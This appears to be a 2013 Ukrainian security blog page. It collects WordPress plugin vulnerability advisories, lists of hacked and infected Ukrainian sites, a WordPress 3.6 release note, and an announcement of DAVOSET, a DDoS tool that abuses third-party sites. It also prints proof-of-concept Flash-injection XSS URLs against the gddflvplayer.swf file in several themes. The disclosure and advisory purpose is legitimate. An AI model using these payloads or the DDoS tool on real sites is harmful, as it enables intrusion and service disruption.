Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах VideoWhisper, Post-Gallery та Simple Login Registration. Для котрих з’явилися експлоіти. VideoWhisper - це плагін для трансляції відео, Post-Gallery - це плагін для створення галерей, Simple Login Registration - це форма реєстрації та логіна.

• WordPress Video Whisper Cross Site Scripting (деталі)
• WordPress Post-Gallery Cross Site Scripting (деталі)
• WordPress Simple Login Registration 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://yalta-gs.gov.ua (хакером NeT-DeViL) - 26.08.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://monuments-crimea.gov.ua (хакером Dr-TaiGaR) - 26.08.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.vdenergy.com.ua (хакером SeCuR!TY DR@G0N) - 19.08.2013, зараз сайт вже виправлений адмінами
• http://www.tip-top-club.com (хакером Erreur 404) - 29.08.2013, зараз сайт вже виправлений адмінами
• http://portfolio.lg.ua (хакером RBG HomS) - 29.08.2013, зараз сайт вже виправлений адмінами

В серпні, 01.08.2013, вийшла нова версія WordPress 3.6.

WordPress 3.6 це перший випуск нової 3.6 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, а також виправлено чимало багів.

Серед головних покращень зокрема можна відзначити нову тему Twenty Thirteen по замовчуванню, покращені ревізії, закріплення постів та налаштовуване автозбереження. А також вбудований HTML5 медіа плеєр та покращений редактор меню.

Окрім покращень для користувачів також були зроблені численні покращення для розробників. А також були виправлені деякі уразливості, про які умисно не згадали в анонсі нової версії WP. Що розробники роблять дуже часто (приховуючи виправлені дірки).

Зокрема виправлені Full path disclosure уразливості в адмінці та покращене виведення помилок БД: тепер помилки виводяться якщо включені обидва WP_DEBUG і WP_DEBUG_DISPLAY.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://odb.kiev.ua - інфекція була виявлена 25.07.2013. Зараз сайт входить до переліку підозрілих.
• http://domdonetsk.in.ua - інфекція була виявлена 13.07.2013. Зараз сайт входить до переліку підозрілих.
• http://allindustry.com.ua - інфекція була виявлена 16.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://autoshrot.zp.ua - інфекція була виявлена 26.06.2013. Зараз сайт не входить до переліку підозрілих.
• http://tunikaindia.com - інфекція була виявлена 30.06.2013. Зараз сайт не входить до переліку підозрілих.

Сьогодні вийшла нова версія програми DAVOSET v.1.1.3. В новій версії:

• Додав підтримку кукісів.
• Додав підтримку задання портів.
• Додав нові сервіси в повний список зомбі.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.1.3.rar.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах HMS Testimonials, ThinkIT WP Contact Form та BackWPup. Для котрих з’явилися експлоіти. HMS Testimonials - це плагін для написання рецензій, ThinkIT WP Contact Form - це контактна форма, BackWPup - це плагін для створення бекапів.

• WordPress HMS Testimonials 2.0.10 XSS / CSRF (деталі)
• WordPress ThinkIT 0.1 CSRF / Cross Site Scripting (деталі)
• WordPress BackWPup 3.0.12 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.kprda.gov.ua (хакером Dr.SHA6H) - 18.08.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://golovderzhkarantyn.gov.ua (хакером Dr.SHA6H) - похаканий державний сайт
• http://revolverlab.com (хакером RBG HomS) - 21.08.2013, зараз сайт вже виправлений адмінами
• http://energomarket.sumy.ua (хакером Hmei7) - 09.02.2013, зараз сайт вже виправлений адмінами
• http://yogalviv.info (хакером Sejeal) - 18.08.2013, зараз сайт вже виправлений адмінами
• http://turistbus.com.ua (хакером dowoh)
• http://airal.com.ua (хакером dowoh) - 29.08.2013, зараз сайт вже виправлений адмінами
• http://bucharest.com.ua (хакером dowoh) - 29.08.2013, зараз сайт заблокований хостером
• http://www.minifermer.com (хакером Moroccan Hassan) - 29.08.2013, зараз сайт вже виправлений адмінами
• http://www.westart.com.ua (хакером Moroccan Hassan) - 29.08.2013, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vipnutrition.com.ua - інфекція була виявлена 11.07.2013. Зараз сайт входить до переліку підозрілих.
• http://screenshot.com.ua - інфекція була виявлена 13.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://rurik.at.ua - інфекція була виявлена 29.06.2013. Зараз сайт входить до переліку підозрілих.
• http://ukrdom.biz - інфекція була виявлена 25.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://skd.vn.ua - інфекція була виявлена 21.07.2013. Зараз сайт входить до переліку підозрілих.
• http://web.kharkov.ua - інфекція була виявлена 22.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://irp.lg.ua - інфекція була виявлена 05.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://vb-agro.org.ua - інфекція була виявлена 22.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://vb-derevo.org.ua - інфекція була виявлена 23.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://buznec.com - інфекція була виявлена 29.06.2013. Зараз сайт не входить до переліку підозрілих.

Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять GDD FLVPlayer.

Раніше я писав про уразливості в GDD FLVPlayer. Це популярна флешка, що знаходиться на тисячах веб сайтів і яка використовується в багатьох веб додатках.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них I Love It (про дірки в цій темі я вже писав), Megusta, Multipress, Lolzine, V1. Та існують інші уразливі теми для WordPress з gddflvplayer.swf.

XSS (через Flash Injection) (WASC-08):

I Love It:

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf?splashscreen=xss.swf

Megusta:

http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/megusta/flv/gddflvplayer.swf?splashscreen=xss.swf

Multipress:

http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/multipress/flv/gddflvplayer.swf?splashscreen=xss.swf

Lolzine:

http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/Lolzine/flv/gddflvplayer.swf?splashscreen=xss.swf

V1:

http://site/wp-content/themes/v1/flv/gddflvplayer.swf?mylogo=xss.swf
http://site/wp-content/themes/v1/flv/gddflvplayer.swf?splashscreen=xss.swf

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/iloveit/

http://site/wp-content/themes/megusta/

http://site/wp-content/themes/multipress/

http://site/wp-content/themes/Lolzine/

http://site/wp-content/themes/v1/

В останній темі шлях може бути v1, v1.0, v1.3.5 та інші варіанти.

Наведені XSS та FPD уразливості, приклади 8 СS уразливостей дивитися у вищенаведеному записі. Вразливі веб додатки, що використовують GDD FLVPlayer v3.635 і попередні версії.

Вразливі всі версії наступних веб додатків: I Love It, Megusta, Multipress, Lolzine, V1.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://podillyarehab.gov.ua (хакерами з islamic ghosts team) - 31.05.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.putivl-rda.gov.ua (хакером Dr.SHA6H) - 13.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.ndippp.gov.ua (хакером Dr.SHA6H) - 25.07.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.yuna.ua (хакером RBG HomS)
• http://visnik-press.com.ua (хакером RBG HomS) - 21.08.2013, зараз сайт вже виправлений адмінами